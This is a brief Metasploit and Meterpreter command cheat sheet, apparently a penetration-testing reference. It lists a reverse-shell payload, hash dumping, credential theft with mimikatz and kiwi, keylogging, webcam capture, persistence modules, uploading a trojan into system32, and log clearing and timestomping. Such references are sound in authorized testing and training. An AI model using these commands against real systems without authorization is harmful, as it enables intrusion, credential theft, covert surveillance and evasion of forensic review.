Metasploit Cheat Sheet

  • service postgresql start
  • msfdb init
  • msfconsole
    • db_nmap -sn […] / db_nmap -T4 -A -v […]
    • show
    • use […]
      • info
      • options
      • payloads
      • targets
      • run / exploit / exploit -j -z
      • jobs
      • sessions
      • sessions -i […]
    • search […]
  • searchsploit […]

Metasploit Popular Modules

  • exploit/multi/handler
  • payload/windows/x64/meterpreter_reverse_tcp
  • post/windows/gather/hashdump
  • post/windows/manage/migrate
  • exploit/windows/local/persistence
  • exploit/windows/local/registry_persistence

Meterpreter Cheat Sheet

  • help
  • background
  • bgrun
  • bglist
  • bgkill
  • cat
  • del
  • timestomp
  • pwd
  • clearev
  • download c:\\boot.ini
  • upload trojan.exe c:\\windows\\system32
  • edit edit.txt
  • execute -f cmd.exe -i -H
  • resource resource.txt
  • search -f autoexec.bat / search -f sea*.bat c:\\xamp\\
  • getuid
  • idletime
  • ipconfig
  • portfwd
  • route
  • sysinfo
  • hashdump
  • getsystem
  • exploit
  • interact
  • ps
  • source
  • shell
  • lcd
  • lpwd
  • lls
  • migrate
  • keyscan_start
  • keyscan_stop
  • keyscan_dump
  • screenshot
  • webcam_list
  • webcam_snap
  • load incognito
    • list_tokens -u
    • list_tokens -g
    • impersonate_token WORKGROUP\\Administrator
  • load kiwi
    • help
    • creds_all
    • rev2self
  • load mimikatz
    • help
    • kerberos
  • run persistence -h
  • run metsvc -A
  • run autoroute -s 10.0.0.0/24
  • run autoroute -p